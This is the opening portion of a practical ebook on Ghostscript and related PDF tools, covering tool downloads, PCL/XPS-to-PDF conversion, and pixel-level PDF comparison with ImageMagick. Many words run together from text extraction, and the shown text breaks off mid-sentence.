Thisworkislicensedundera CreativeCommonsAttribution-NonCommercial-ShareAlike3.0Unported
License
Tweet This Book!
PleasehelpKurtPfeiflebyspreadingthewordaboutthisbookon Twitter!
Thesuggestedhashtagforthisbookis #pdfkungfoo .
Findoutwhatotherpeoplearesayingaboutthebookbyclickingonthislinktosearchforthishashtag
onTwitter:
https://twitter.com/search?q=#pdfkungfoo
Also By Kurt Pfeifle
PDF-KungFooWorkshopI
Contents
Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i
Changelog(majorchangesonly) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ii
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iii
I 100TippsandTricks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1 Downloadingthetools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2 HowcanIconvertPCLtoPDF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
3 HowcanItoconvertXPStoPDF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
4 HowcanIunittestaPythonfunctionthatdrawsPDFgraphics? . . . . . . . . . . . . . . . 11
5 HowcanIcompare2PDFsonthecommandline? . . . . . . . . . . . . . . . . . . . . . . . . 13
6 HowcanIremovewhitemarginsfromPDFpages? . . . . . . . . . . . . . . . . . . . . . . . 21
7 UsingGhostscripttogetpagesize . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
II Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
8 HowcanIextractembeddedfontsfromaPDFasvalidfontfiles? . . . . . . . . . . . . . . 29
9 HowcanIgetGhostscripttouseembeddedfontsinPDF? . . . . . . . . . . . . . . . . . . . 33
III ScannedPagesandPDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
10 HowcanImaketheinvisibleOCRinformationonascannedPDFpagevisible? . . . . . . 36
IV Colors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
11 HowcanIconvertacolorPDFintograyscale? . . . . . . . . . . . . . . . . . . . . . . . . . 42
V Using pdfmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
12 HowcanIuse pdfmarktoinsertbookmarksintoPDF?(CONTENTSTILLMISSING) . . . .47
CONTENTS
VI Textextraction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
13 HowcanIextracttextfromPDF?(CONTENTSTILLMISSING) . . . . . . . . . . . . . . . . 49
VII Miscellaneous . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
14 HowtorecognizePDFformat? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
VIII SomeTopicsinDepth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
15 CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’
or‘tiffg4’)? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Appendix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
AbouttheAuthor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Acknowledgements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
Metadata
1Title: 100 Tipps and Tricks with Ghostscript &amp; Co.
2Rights: Copyright 2013 by <kurt.pfeifle@gmail.com>
3Copyright: Copyright 2013 by <kurt.pfeifle@gmail.com>
4Coverage: Practical Examples and Commandlines Explained
5Creator: <kurt.pfeifle@gmail.com>
6Type: PDF, Fonts, Images + Prepress Knowhow
7Description: A Prepress Professional's Brain Backup
8Version: v0.1.06
9Publication date: 2013-08-20
10 Publisher: Self-Published
11 Language: en
12 Author: <kurt.pfeifle@gmail.com>
13 Affiliation: Kurt Pfeifle IT-Beratung
14 Affiliation: PDF Association
15 Affiliation: PDF/A Competence Center
16 Affiliation: PDF/X Ready Switzerland
17 Affiliation: ForschungsGesellschaft Druck e.V. (Fogra)
18 Languages: english
19 Date: 2013, July 31st
20 Identifier UUID: urn:uuid:8cc9b6b0-3849-4624-8d19-bf76d5948875
i
Changelog (major changes only)
Version Date ChangeDescription
v0.1.00 2013-07-07 Initialversion(unreleased)
v0.1.01 2013-07-08 Addedchapter “HowcanIconvertPCLtoPDF?”
v0.1.02 2013-07-09 Addedchapter “HowcanIconvertXPStoPDF?”
v0.1.03 2013-07-10 AddedaChangelog
AddedaTableofContent
v0.1.04 2013-07-10 Addedchapter “Whydoesn’tAcrobatDistillerembedallfontsfully?”
Addedchapter “HowcanIunittestaPythonfunctionthatdrawsPDFgraphics?”
v0.1.05 2013-07-11 Addedchapter “HowcanIqueryGhostscriptdefaultsettings?”
Addedchapter “HowcanIcompare2PDFsonthecommandline?”
Addedchapter “HowcanIremovewhitemarginsfromPDF?”
v0.1.06 2013-07-11 Firstpubliclyavailableversion(released);ca.10%complete
v0.1.07 2013-07-12 Addedchapter “HowcanIextractembeddedfontsfromaPDFasvalidfontfiles?”
v0.1.08 2013-07-13 Addedappendix “Abouttheauthor”
v0.1.09 2013-07-14 Addedchapter “HowcanIaddannotationstoaPDF?”
v0.1.10 2013-07-15 Addedchapter “HowcanIletGhostscriptdeterminethenumberofPDFpages?”
v0.1.11 2013-08-29 Addedchapter “HowdoImakeGhostscriptshowallfontsitcanfindonmylocalsystem?”
v0.1.12 2013-08-31 Updatedchapter “Downloadingthetools” toreflectGS9.09release
v0.1.13 2013-09-01 Secondpubliclyavailableversion(released);ca.11%complete
v0.1.14 2013-09-02 Addedchapter “HowcanIconvertfontstooutlinesinanexistingPDF?”
v0.1.15 2013-09-03 Addedchapter “HintsforLinux,Windows,MacOSXandUnixUsers”
v0.1.16 2013-09-04 Addedchapter “HowcanIuseinvisiblefontsinaPDF?”
v0.1.17 2013-09-05 Addedchapter “HowcanImakeinvisibleOCRinformationinscannedPDFsvisible?”
v0.1.18 2013-09-06 Addedillustrationstonewlyaddedchapter
v0.1.19 2013-09-07 Re-wrotechapter “HowcanIcompare2PDFsonthecommandline?”
Addedillustrationsandexamplestooverhauledchapterforreaderstoreproduce
Thirdpubliclyavailableversion(released);ca.16%complete
v0.1.20 2013-09-08 Addedchapter “HowcanIconvertacolorPDFintograyscale?”
v0.1.21 2013-09-09 Addedillustrationstonewlyaddedchapter
v0.1.22 2013-09-10 Addedchapter “HowcanIunderstandwhatthisfunny‘pdfmark’stuffisabout?”
v0.1.23 2013-09-11 Addedchapter “HowcanIuse pdfmarkwithGhostscripttochangePDFmetadata?”
v0.1.24 2013-09-12 Addedillustrationstonewlyaddedchapter
v0.1.25 2013-09-13 Addedchapter “HowcanIuseGhostscriptasacalculatorinsidetheshell?”
v0.1.26 2013-09-14 Addedchapter “Doyoualsousenon-FOSStoolsforyourPDF-relatedwork?Ifso,which?”
4thpubliclyavailableversion(released);ca.21%complete
v0.1.27 2013-09-22 Addedchapter “HowcanIre-orderpagesinaPDF?”
5thpubliclyavailableversion(released);ca.22%complete
v0.1.28 2013-10-24 Addedchapter “WhydoyoucallApple’sPreview.app ‘evil, malicious and ambidextrous to
unsuspecting users’ ?”
v0.1.29 2014-04-02 Updatedchapter “Downloadingthetools” toreflectGS9.14releaseandotherupdates
v0.1.30 2014-04-13 6thpubliclyavailableversion(released);ca.23%complete
ii
Introduction
You do not want to read introductionary blah-blah? Have Ghostscript and other tools already
installed? Want to immediately dive into the thick of PDF KungFoo? Read immediately a
chapter with the real stuff? Then you could click to jump to...
•...the first one how to convert PCL files to PDF . But my recommendation is...
•...the method to make the invisible OCR text visible .
Thisbookisstill“workinprogress”.ItsummarizessomeofthepracticalsolutionsIappliedtoreal-world
problemsencounteredbymyclients.
Mostof the book’s chapters deal with Ghostscript commands.But sometimes Ialso referto otherhelper
utilities,whichIemploywhenGhostscriptisn’ttherighttoolforthejob.
Eachchapterisintendedtobeofimmediatepracticalvalue,andeachonecanstandonitsown,givingthe
reader a basic or more advanced “recipe” that can be applied and adapted to his own situation, while at
thesametimegivingadditionalbackgroundinformationandhighlightingtechnicalconceptsincontext.
While this book is still work in progress, readers are encouraged to submit their own suggestions and
questionsabouttopicstobeincludedintothefinalversion.
Myexperienceintheprepressworldandintheprintingindustryspansover2decades.Todate,I’veused
Ghostscript and other Free Software tools for more than 15 years. Most of the ‘problems’ and practical
tasksIdescribeherehavebeenposedtome...
•...either from paying customers, whom I helped through consulting, troubleshooting, training or
softwaredevelopmentactivities,
•...orfromemailsIreceived(sometimesfrompeopleIhavenotheardofbeforeorafter)askingme
someparticularquestionaboutaproblem,
•...orviasomepublicinternetforum,newsgrouporplatformwherepeopleaskIT-orprogramming
relatedquestions,mostprominentlyonStackOverflow.com.
LuckilyIkeptarecordofthemostinterestingandofthemostcommonlyaskedthings.
Whatyoucanreadhereisacondensedsummaryfrommyarchives.SometimesIdidn’twriteparagraphs
completelyfromscratch,butcopiedthemstraightfrommyoldmails.So,ifyoucomeacrosssomesentence
in the “Question” or the “Answer” section of the coming chapters which sounds familiar to you: maybe
it’sbecause yousentmethequestionbefore,orbecauseyoureceivedthesameanswerfrommeyearsago.
Overtime,Imaydecidetoedit,polishandstraightenmanyoftheoriginal,still“raw”piecesinthisbook.
However,thismayalsodependonreaders’generalfeedback.
Be warned though: this document is not necessarily a comprehensive, systematic tutorial! Some of the
snippets explained in different chapters may be duplicates and therefor could be seen as redundant.
However, should you end up reading and working through all chapters of the booklet, you’ll remember
thesepartsbetterandyoumayhavegainedarathercompletepictureofGhostscript’scapabilities:-)
While I didn’t do a precise count: I’m pretty sure that a newbie Ghostscript user will easily find 100
different pieces of practical Ghostscript usage snippets here, even if the book currently does not (yet)
contain100distinctchapters.Experienceduserswillalsobeabletofindoneortheother‘gemofwisdom’.
iii
Introduction iv
AllinallIhopeyou’llfindmy‘PDF-KungFoo–100Tips+TricksforGhostscript&Co.’useful.Iintendto
expandandupdatethisdocumentovertime.Readerswillbeentitledtofreeupdates.SoIhope,inayear
or two, you will have a document which could rather be named ‘100 Chapters with 1000 Tipps + Tricks
forGhostscript&Co.’
*–KurtPfeifle
I100 Tipps and Tricks
1Downloading the tools
MyownpreferredworkenvironmentsareLinuxandMacOSX.However,mostofthemethodsexplained
inthefollowingchapterscanbeappliedtoWindowstoo.Readerswillbenefitmostfromthisbookifthey
reproduce and play with some of the example commandlines given. To do that they should install the
followingtools.
1.1Windows
Thesearethepreferreddownloadsites.Theyaretheoneswhichareofferedbythe respective developers
themselves .Donoteveruseanyother,third-partydownloadlinks,unlessyoureallyknowwhatyoudo!
•Download Ghostscript 1:
http://downloads.ghostscript.com/public/ 2
CurrentlyavailableareinstallerfilesforWindows:
–gs914w32.exe 3(forallWindowsOS32bit,butalsoworksonWindows64bit)
–gs914w64.exe 4(doesnotworkonWindows32bit–butGhostscriptdeveloperswarnanyway:
the64bitversionmayevenrunsloweron64bitthandoesthe32bitversionon64bitWindows!)
–Keepyoureyesopenfornewerversionsappearinginthatdirectory!
•Download GhostPCL 5:
http://downloads.ghostscript.com/public/binaries/ 6
Currentlyavailablearepre-compiled32-bitbinariesforWindowsembeddedina*.zipfile:
–ghostpcl-9.14-win32.zip 7
–Keepyoureyesopenfornewerversionsappearinginthatdirectory!
•Download GhostXPS 8:
http://downloads.ghostscript.com/public/binaries/ 9
Currentlyavailablearepre-compiled32-bitbinariesforWindowsembeddedina*.zipfile:
–32-bitVersion: ghostxps-9.14-win32.zip 10
–Keepyoureyesopenfornewerversionsappearinginthatdirectory!
•Download XPDF-Utils 11(CLItools:pdffonts,pdfinfo,pdfimages,pdftotext,pdftops...)
http://www.foolabs.com/xpdf/download.html 12
Currentfileversion:
1http://www.ghostscript.com/download/gsdnld.html
2http://downloads.ghostscript.com/public/
3http://downloads.ghostscript.com/public/gs914w32.exe
4http://downloads.ghostscript.com/public/gs914w64.exe
5http://www.ghostscript.com/download/gpcldnld.html
6http://downloads.ghostscript.com/public/binaries/
7http://downloads.ghostscript.com/public/binaries/ghostpcl-9.14-win32.zip
8http://www.ghostscript.com/download/gxpsdnld.html
9http://downloads.ghostscript.com/public/binaries/
10http://downloads.ghostscript.com/public/binaries/ghostxps-9.14-win32.zip
11http://www.foolabs.com/xpdf/about.html
12http://www.foolabs.com/xpdf/download.html
2
Downloadingthetools 3
–xpdfbin-win-3.03.zip 13
The .zip contains pre-compiled binaries for Windows. It’s not an installer: just unpack
anywhere you want, modify the %PATH% variable to find the binaries and start them from
an CMD window.
You may want to additionally add one or more of the *‘Language Support Packages’ .
–Keepyoureyesopenfornewerversionsappearinginthatdirectory!
•Download qpdf14:
32-bitVersion: http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-mingw32.zip 15
64-bitVersion: http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-mingw64.zip 16
64-bitVersion: http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-msvc64.zip 17
•Download pdftk18:
http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/pdftk_server-2.02-win-setup.exe 19
•Download ImageMagick 20:
http://www.imagemagick.org/download/binaries/ 21(make sure to select the correct and most
currentdownloadforyoursystem)
A Warning Note about Downloading from Sourceforge
Sourceforge.netusedtobearesourcethatwasveryusefulfortheOpenSourcecommu-
nity.However,inrecentyearsthesitehasbecomemoreandmoreoverloadedwithads.
SomeofthemorerecentstoriesontheInternetevensuggestthatthesitemaybepoisoned
withlinksthatleadyoutothirdparty ‘drive-by’ malwaredownloadsites.
Unfortunately,someofthetoolsadvertisedinthiseBook(suchas qpdf)stilldohosttheir
source code or their Windows binaries on this platform. I’m hoping the developers of
thesetoolswillfindsomeotherhostingsoon...
:-(
1.2Mac OS X
Myrecommendationistousethe‘MacPorts’frameworkforinstallingadditionalsoftwarepackages:
•http://www.macports.org/install.php 22
After you have put MacPorts in place, open a Terminal.app window and start installing the packages by
typing:
13ftp://ftp.foolabs.com/pub/xpdf/xpdfbin-win-3.03.zip
14http://qpdf.sf.net/
15http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-mingw32.zip/download
16http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-mingw64.zip/download
17http://sourceforge.net/projects/qpdf/files/qpdf/5.1.1/qpdf-5.1.1-bin-msvc64.zip/download
18http://www.pdflabs.com/tools/pdftk-server/
19http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/pdftk_server-2.02-win-setup.exe
20http://www.imagemagick.org/
21http://www.imagemagick.org/download/binaries/
22http://www.macports.org/install.php
Downloadingthetools 4
..1 sudo port -p install ghostscript poppler ImageMagick coreutils qpdf pdftk
Be aware that this may take a while. Ghostscript depends on additional packages for its functionality,
like libpng,jpeg,tiff,zlibandmore.Thesameappliesfortheothertools.The portcommanddownloads,
compilesandinstallsallthesedependenciesautomatically,sothismaytakequiteawhile...
1.3Linux
Debian, Ubuntu, ...
Youcanrunthiscommandinaterminalwindow:
..1 sudo apt-get install ghostscript poppler-utils ImageMagick coreutils qpdf
Oryouusethepackagemanagerofyourchoicetofindandinstallthepackages...
RedHat, Fedora
Commandinaterminalwindow:
..1 sudo yum install ghostscript poppler-utils ImageMagick coreutils qpdf
Slackware
Commandinaterminalwindow:
..1 TODO
1.4Documentation
Downloadingthetools 5
..1 TODO
2How can I convert PCL to PDF?
..IsitpossibletouseGhostscriptforconvertingPCLprintfilestoPDFformat?Ifso,how?
2.1Answer
No,it’snotpossiblewithGhostscriptitself...
But yes!, it’s very well possible with another cool piece of workhorse software from the same barn: its
nameist GhostPCL.
Ghostscriptdevelopersinrecentyearsintegratedtheirsisterproducts GhostXPS,GhostPCL and GhostSVG
intotheirmain Ghostscriptsourcecodetree 1,whichswitchedfromSubversiontoGitsometimeago.The
completefamilyofproductsisnowcalled GhostPDL .Soalloftheseadditionalfunctionalities(load,render
andconvertXPS,PCLandSVG)arenowavailablefromthere.
Previously,thoughGhostPCLwasavailableasasourcecodetarball,itwashardlytobefoundonthe‘net.
The major Linux distributions (Debian, Ubuntu, Redhat, Fedora, OpenSUSE,...) don’t provide packages
fortheiruserseither.OnMacPortsitismissingtoo.
Thismeansyouhavetobuildtheprogramsyourselffromthesources.Youcouldevencompiletheso-called
language switching binary, pspcl6. This binary, in theory, can consume PCL, PDF and PostScript and
convertthisinputtoahostofotherformats.Justrun make ls-product inthetoplevelGhostscriptsource
directoryinordertobuildit.Theresultingbinarywillendupinthe ./language-switch/obj/ subdirectory.
Run make ls-install inordertoinstallit.
W ARNING: WhileitworkedformewheneverIneededit,Ghostscriptdevelopersrecommend
tostopusingthelanguageswitchingbinary(sinceit’s ‘almost non-supported’ astheysay,and
itwillpossiblygoawayinthefuture).
Insteadtheyrecommendtousetheexplicitbinaries:
•pcl6orpcl6.exe forPCLinput,
•gsvgorgsvg.exe for SVG input (also ‘almost non-supported’ but it may work better
thanthelanguageswitchingbinary pspcl6)and
•gxpsorgxps.exe forXPSinput(supportstatusuncleartome).
Sofor ‘converting PCL code to PDF format’ astherequestreads,youcouldusethe pcl6command
line utility, the PCL consuming sister product to Ghostscript’s gs(Linux, Unix, Mac OS X) and
gswin32c.exe /gswin64c.exe (Windows) whicharePostScriptandPDFinputconsumers.
1http://git.ghostscript.com/?p=ghostpdl.git;a=summary
6
HowcanIconvertPCLtoPDF? 7
Sample commandline (Windows):
..1 pcl6.exe ^
2 -o output.pdf ^
3 -sDEVICE=pdfwrite ^
4 [...more parameters as required (optional)...] ^
5 -f input.pcl
Sample Commandline (Linux, Unix, Mac OS X):
..1 pcl6 \
2 -o output.pdf \
3 -sDEVICE=pdfwrite \
4 [...more parameters as required (optional)...] \
5 -f input.pcl
Explanation
-o output.pdf
The -oparameter determines the location of the output. In this case it will be the file output.pdf
in the current directory (since we did not specify any path prefix for the filename). At the same
time, using -osaves us from typing -dBATCH -dNOPAUSE -dSAFER , because -oimplicitly does also
settheseparameters.
-sDEVICE=pdfwrite
This parameter determines which kind of output to generate. In our current case it will be
PDF. If you wanted to produce a multipage grayscale TIFF with CCITT compression, you would
change that to -sDEVICE=tiffg4 (don’t forget to modify the output file name accordingly too: -o
output.tif ).
-f input.pcl
This parameter determines which file to read as input. In this case it is the file input.pclin the
currentdirectory.
Update:The Ghostscript website now at least for Windows users offers pre-compiled 32-bit binaries for
GhostPCLandGhostXPS.
•http://downloads.ghostscript.com/public/binaries/ghostpcl-9.14-win32.zip 2
•http://downloads.ghostscript.com/public/binaries/ghostxps-9.14-win32.zip 3
2http://downloads.ghostscript.com/public/binaries/ghostpcl-9.14-win32.zip
3http://downloads.ghostscript.com/public/binaries/ghostxps-9.14-win32.zip
HowcanIconvertPCLtoPDF? 8
Seealsothehintsin*’[HowcanIconvertXPStoPDF?](#convert-xps-to-pdf)’*.
TODO!HintabouttheGhostPCLlicensing.Esp.important:hintabouttheURWfontswhicharenotGPL
(theyrequirecommerciallicensingforcommercialuse).
3How can I to convert XPS to PDF?
..HowcanIconvertXPStoPDF?IsthispossiblewithGhostscript?
3.1Answer
Ghostscriptdevelopersinrecentyearshaveintegratedasisterproductnamed GhostXPS intotheirmain
Ghostscript source code tree 1, which is based on Git now. (They have also included two other products,
named GhostPCL and GhostSVG .) The complete family of products is now called GhostPDL . So all of
theseadditionalfunctionalities(load,renderandconvertXPS,PCLandSVG)arenowavailablefromone
location.
Unfortunately,noneofthemajorLinuxdistributions(Debian,Ubuntu,Redhat,Fedora,OpenSUSE,...)do
currently provide packages for their users. On MacPorts GhostXPS is missing too, as are GhostPCL and
GhostSVG.
Thismeansyouhavetobuildtheprogramsyourselffromthesources–unlessyouareaWindowsuser.In
thiscaseyouarelucky:thereisa*.zipcontainerontheGhostscriptwebsite,whichcontainsapre-compiled
Win32binary(whichalsorunsonWindows64bit!):
•http://downloads.ghostscript.com/public/binaries/ghostxps-9.07-win32.zip 2
Whileyou’reatitandbuildthecodeyourself,youcouldevenbuildaso-called language switching binary.
TheMakefilehastargetspreparedforthat.ThisbinarycanconsumePCL,PDFandPostScript.Itconverts
these input formats to a host of other file types. Just run make ls-product && make ls-install in the
toplevelGhostscriptsourcedirectoryinordertogetitinstalled.
W ARNING: WhileitworkedformewheneverIneededit,Ghostscriptdevelopersrecommend
tostopusingthelanguageswitchingbinary(sinceit’s ‘almost non-supported’ astheysay,and
itwillpossiblygoawayinthefuture).
Instead they recommend to use the explicit binaries, also supported as build targets in the
Makefile:
•pcl6orpcl6.exe forPCLinput,
•gsvgorgsvg.exe forSVGinput(also‘almostnon-supported’)and
•gxpsorgxps.exe forXPSinput(supportstatusuncleartome).
1http://git.ghostscript.com/?p=ghostpdl.git;a=summary
2http://downloads.ghostscript.com/public/binaries/ghostxps-9.07-win32.zip
9
HowcanItoconvertXPStoPDF? 10
Sample commandline (Windows):
..1 gxps.exe ^
2 -o output.pdf ^
3 -sDEVICE=pdfwrite ^
4 [...more parameters as required (optional)...] ^
5 -f input.xps
Sample commandline (Linux, Unix, Mac OS X):
..1 gxps \
2 -o output.pdf \
3 -sDEVICE=pdfwrite \
4 [...more parameters as required (optional)...] \
5 -f input.xps
Explanation
-o output.pdf
The -oparameter determines the location of the output. In this case it will be the file output.pdf
in the current directory (since we did not specify any path prefix for the filename). At the same
time, using -osaves us from typing -dBATCH -dNOPAUSE -dSAFER , because -oimplicitly does also
settheseparameters.
-sDEVICE=pdfwrite
Thisparameterdetermineswhichkindofoutputtogenerate.Inourcurrentcasethat’sPDF.Ifyou
wanted to produce a PostScript level 2 file, you would change that to -sDEVICE=ps2write (don’t
forgettomodifytheoutputfilenameaccordinglytoo: -o output.ps ).
-f input.pcl
This parameter determines which file to read as input. In this case it is the file input.pclin the
currentdirectory.
Seealsothehintsin*[’HowcanIconvertPCLtoPDF?’](#convert-pcl-to-pdf.html)*.
TODO!HintabouttheGhostPCLlicensing.Esp.important:hintabouttheURWfontswhicharenotGPL
(theyrequirecommerciallicensingforcommercialuse).
4How can I unit test a Python function that
draws PDF graphics?
..I’mwritingaCADapplicationthatoutputsPDFfilesusingtheCairographicslibrary.Alotoftheunit
testing does not require actually generating the PDF files, such as computing the expected bounding
boxes of the objects. However, I want to make sure that the generated PDF files “look” correct after I
changethecode.
Is there an automated way to do this? How can I automate as much as possible? Do I need to visually
inspecteachgeneratedPDF?HowcanIsolvethisproblemwithoutpullingmyhairout?
4.1Answer
I’mdoingthesamethingusingashellscriptonLinuxthatwraps
1.ImageMagick’s comparecommand
2.thepdftkutility
3.Ghostscript(optionally)
(Itwouldberathereasytoportthistoa .batBatchfileforDOS/Windows.)
IhaveafewreferencePDFscreatedbymyapplicationwhichare“knowngood”.NewlygeneratedPDFs
after code changes are compared to these reference PDFs. The comparison is done pixel by pixel and is
savedasanewPDF.InthisPDF,allunchangedpixelsarepaintedinwhite,whilealldifferingpixelsare
paintedinred.
Thismethodutilizesthreedifferentbuildingblocks: pdftk,compare(partofImageMagick)andGhostscript.
pdftk
UsethiscommandtosplitmultipagePDFfilesintomultiplesinglepagePDFs:
..1pdftk reference.pdf burst output somewhere /reference_page_ %03d.pdf
2pdftk comparison.pdf burst output somewhere /comparison_page_ %03d.pdf
11
HowcanIunittestaPythonfunctionthatdrawsPDFgraphics? 12
compare
Usethiscommandtocreatea“diff”PDFpageforeachofthepages:
..1 compare \
2 -verbose \
3 -debug coder -log "%u %m:%l %e" \
4 somewhere/reference_page_001.pdf \
5 somewhere/comparison_page_001.pdf \
6 -compose src \
7 somewhereelse/reference_diff_page_001.pdf
Ghostscript
Because of automatically inserted meta data (such as the currentdate+time), PDF output is not working
wellforMD5hash-basedfilecomparisons.
Ifyouwanttoautomaticallydiscoverallcaseswhichconsistofpurelywhitepages,youcouldalsoconvert
toameta-datafreebitmapformatusingthe bmp256outputdevice.YoucandothatfortheoriginalPDFs
(referenceandcomparison),orforthediff-PDFpages:
..1 gs \
2 -o reference_diff_page_001.bmp \
3 -r72 \
4 -g595x842 \
5 -sDEVICE=bmp256 \
6 reference_diff_page_001.pdf
7
8 md5sum reference_diff_page_001.bmp
IftheMD5sumiswhatyouexpectforanall-whitepageof595x842PostScriptpoints,thenyourunittest
passed.
5How can I compare 2 PDFs on the
commandline?
..I’mlookingforaLinuxcommandlinetooltocomparetwoPDFfilesandsavethediffstoaPDF
outfile.Thetoolshouldcreatediff-PDFsinabatch-process.ThePDFfilesareconstructionplans,
sopuretext-comparedoesn’twork.
Somethinglike:
1 <tool> file1.pdf file2.pdf -o diff-out.pdf
MostofthetoolsIfoundconvertthePDFstoimagesandcomparethem,butonlywithaGUI.
Anyothersolutionisalsowelcome.
5.1Answer
Whatyouwantcanbeachievedwithusing ImageMagick 1’scomparecommand.Andthiswillworkonall
importantoperatingsystemplatforms:Windows,MacOSX,LinuxandvariousUnixvariations.
Thebasiccommandisverysimple:
..1 compare file1.pdf file2.pdf delta1.pdf
First,pleasenote: thisonlyworkswellforPDFswhichusethesamepage/mediasize.
The comparison is done pixel by pixel between the two input PDFs. In order to get the pixels, the pages
arerenderedtorasterimagesfirst,bydefaultusingaresolutionof72ppi( pixels per inch ).Theresulting
fileisanimageshowingthe“diff”likethis:
•Eachpixelthatisidenticaloneachinputfilebecomeswhite.
•Eachpixelthatisdifferentbetweenthetwoinputfilesispaintedinred.
•The‘source’file(thefirstonenamedinthecommand)will,forcontext,beusedtoprovideagray-
scalebackgroundtothediffoutput.
1http://www.imagemagick.org/
13
HowcanIcompare2PDFsonthecommandline? 14
The above command outputs a PDF file, delta.pdf . Should you prefer a PNG image or a JPEG image
insteadofaPDF,simplychangethesuffixofthe‘delta’filename:
..1compare file1.pdf file2.pdf delta2.png
2compare file1.pdf file2.pdf delta3.jpeg
Insomecasesthedefaultresolutionof72ppiusedtorenderthePDFpagesmaybeinsufficienttouncover
subtledifferences.Or,onthecontrary,itmayover-emphasizedifferenceswhicharetriggeredbyextremely
minimal shifts of individual characters or lines of text caused by some computational rounding of real
numbers.
So, if you want to increase the resolution, add the -density NNN parameter to the commandline. To get
720ppiimages,usethis:
..1compare -density 720 file1.pdf file2.pdf delta4.pdf
Note,increasing the density/resolution of the output files also increases processing time and
outputfileformatsaccordingly.A10-foldincreaseindensityleadstoa100-foldincreaseinthe
numberoftotalpixelsthatneedtobecomparedandprocessed.
Alloftheaboveexamplesdoonlyworkfor1-pagePDFfiles.Formulti-pagePDFsyouneedtoadda [N]
notation to the file name, where Nis the zero-based page number (page 1 is noted as [0], page 2 as [1],
page3as [2],andsoforth).Thefollowingcomparespage4of file1.pdf withpage18of file2.pdf :
..1compare file1.pdf[3] file2.pdf[17] delta5.pdf
Ifyoudonotwantthegray-scalebackgroundcreatedfromthesourcefile,useamodifiedcommand:
..1compare file1.pdf file2.pdf -compose src delta1.pdf
This modification changes the output to purly red/white: all pixels which are identical between the two
basefilesarered,identicalpixelsarewhite.
Incaseyoudonotliketheredandwhitedefaultcolorstovisualizethepixeldifferences,youcanaddthe
followingcommandlineparameters:
HowcanIcompare2PDFsonthecommandline? 15
•-highlight-color blue (changedefaultcolorforpixeldifferencesfrom‘red’to‘blue’)
•-lowlight-color yellow (changedefaultcolorforidenticalpixelsfrom‘white’to‘yellow’)
or any other color combination you desire. Allowed names for colors include #RRGGBBvalues for RGB
shades.
Note,ImageMagick’s comparecommanddoesnotprocessthePDFinputfilesdirectly. compare
originallywasdesignedtoprocessrasterimagesonly.Youcaneasilytestthisbyreplacingthe
PDFs in above commands with some image files – just make sure that the files are ‘similar
enough’ to give sensible results, and also ensure, that the compared images do have the same
dimensionsinwidthandheight.
To process PDFs, ImageMagick needs to resort to Ghostscript as its ‘delegate’ program for
processingPDFinput.Ghostscriptgetscalledbehindthecurtainsby compareinordertocreate
therasterfileswhichthen comparedoesitsmagicon.
ToseetheexactcommandlineparametersthatImageMagickusesforGhostscriptcall,justadd
a-verbose parameter to the comparecommands. The output on the terminal/console will be
muchmoreverboseandrevealwhatyouwanttoknow.
Examples
I’m using this very same method for example to discover minimal page display differences when font
substitutioninPDFprocessingcomesintoplay.
Itcaneasilybethecase,thatthereisnovisibledifferencebetweentwoPDFs,thoughtheyareextremely
differentinMD5hashes,filesizesorinternalPDFcodestructure.Inthiscasethe delta1.pdf outputPDF
pagefromtheabovecommandwouldbecomeall-white.Youcouldautomaticallydiscoverthiscondition,
soyouonlyhavetovisuallyinvestigatethenon-whitePDFsbydeletingtheall-whiteonesautomatically.
To give you a more visual impression about the way this comparison works, I’ve constructed a few
different input files. I used Ghostscript to do this. (The exact commands I used are documented at the
endofthischapter.)
Example 1
The following image shows two PDF pages side by side. Most people will notice from a quick look the
differencesbetweenthesetwopages:
TwoPDFpageswhichdodiffer–differencescanbespottedbylookingtwice...
Nowusethefollowingcommandstocreateafewdifferentvisualizationofthe‘deltas’:
HowcanIcompare2PDFsonthecommandline? 16
..1compare file1.pdf file2.pdf delta1.png # default resolution, 72 ppi
2compare file1.pdf file2.pdf -compose src delta2.png # default resolution, 72 ppi
3compare -density 720 file1.pdf file2.pdf delta3.png # resolution of 720 ppi
4compare -density 720 file1.pdf file2.pdf -compose src delta4.png # 720 ppi
Theresulting‘delta’imagesareshowninthefollowingpicture.
Fourdifferentvisualizationsofdifferences.Thetoptwousea72ppiresolution,thebottomtwoa720ppiresolution.The
2ndandthe4thdonotshowagrayscalecontextbackground,butonlywhiteandredpixels.
As you can easily see, the 72 ppi-based comparison of the two input PDFs shows a clearly visible
